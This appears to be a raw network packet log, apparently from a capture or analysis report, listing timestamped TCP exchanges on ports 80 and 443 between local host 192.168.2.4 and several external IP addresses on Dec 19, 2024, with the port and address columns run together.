                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.276647091 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.276786089 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.276796103 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.313468933 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.313538074 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.314730883 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.314737082 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.314966917 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.316200972 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.316397905 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.316428900 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.316871881 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.316880941 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.888715029 CET8049768185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.891385078 CET4976880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.956109047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:42.960015059 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.079973936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.080030918 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.081470013 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.081548929 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.103363991 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.107393980 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.135709047 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.177515030 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.255409002 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.298259020 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.317059040 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.317502022 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.317526102 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.318583012 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.318633080 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.320158005 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.320266962 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.335880995 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.335891008 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.351969957 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.352101088 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.352149963 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.352288961 CET49767443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.352303028 CET44349767104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.380698919 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.625303030 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.625366926 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.625595093 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.625910044 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:43.625932932 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.112612009 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.112704992 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430156946 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430170059 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430181026 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430248022 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.430310965 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431080103 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431106091 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431121111 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431170940 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.431170940 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.432712078 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.432764053 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433417082 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433429003 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433442116 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433463097 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.433490038 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.544400930 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.551835060 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.551907063 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.552000046 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.552042961 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.557173014 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.557331085 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.557730913 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.557780981 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.664885044 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.664900064 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.664954901 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.664984941 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.669703007 CET8049765185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.670469999 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.670495987 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.670523882 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.670542955 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.670720100 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.670819998 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.670878887 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.674680948 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.674734116 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.674797058 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.674838066 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.682662010 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.682732105 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.683140993 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.683253050 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.688949108 CET49769443192.168.2.498.85.100.80
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.688970089 CET4434976998.85.100.80192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.690337896 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.690474033 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.690535069 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.700076103 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.700159073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.700531960 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.700623989 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.707623959 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.707695007 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.707801104 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.707871914 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.716306925 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.716331005 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.716376066 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.716393948 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.723373890 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.723556995 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.723607063 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.731400967 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.731467962 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.731534958 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.731600046 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.739346027 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.739412069 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.739630938 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.739809036 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.746764898 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.747219086 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.747294903 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.862313986 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.862332106 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.862386942 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.868751049 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.868767023 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.868803024 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.868824005 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.872622967 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.872692108 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.873249054 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.873361111 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.875385046 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.875412941 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.875444889 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.875502110 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.881412029 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.881465912 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.881613970 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.881665945 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.881990910 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.882069111 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.883438110 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.883445024 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.884355068 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.885580063 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.885730982 CET49773443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.885735989 CET44349773104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.887130976 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.887200117 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.887379885 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.887434959 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.893363953 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.893512964 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.893573046 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.898716927 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.898802996 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.898870945 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.898930073 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.904036999 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.904124022 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.904304028 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.904357910 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.909734011 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.909784079 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.909883022 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.910080910 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.915904045 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.915956974 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.916049957 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.916102886 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.921749115 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.921807051 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.922103882 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.922338963 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.928816080 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.928854942 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.928910971 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.933075905 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.933192968 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.933279991 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.933326960 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.939158916 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.939234018 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.939503908 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.945159912 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.945173979 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.945228100 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.954999924 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.955054998 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.955625057 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.955697060 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.956260920 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.956278086 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.956329107 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.958901882 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.958949089 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.959306955 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.959424973 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.964171886 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.964226961 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.964540005 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.964586973 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.969600916 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.969650030 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.969758987 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.969855070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.975327969 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.975394964 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.976176977 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.976227045 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.980635881 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.980690002 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.980748892 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.980791092 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.986435890 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.986485004 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.986488104 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:44.986527920 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.079586029 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.079647064 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.079725981 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.079868078 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.081681013 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.081733942 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.082453966 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.082509041 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.088375092 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.088388920 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.088432074 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.093991995 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.094007969 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.094018936 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.094048023 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.094059944 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.094577074 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.094631910 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.096689939 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.096877098 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.097141027 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.097256899 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.100403070 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.100418091 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.100471020 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.100518942 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.103667021 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.103729010 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.103748083 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.103794098 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.106842041 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.106909037 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.106930017 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.107141018 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.110749006 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.110764027 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.110824108 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.114005089 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.114062071 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.114118099 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.114166021 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.117753983 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.117813110 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.117964983 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.118025064 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.121701002 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.121715069 CET804977231.41.244.11192.168.2.4
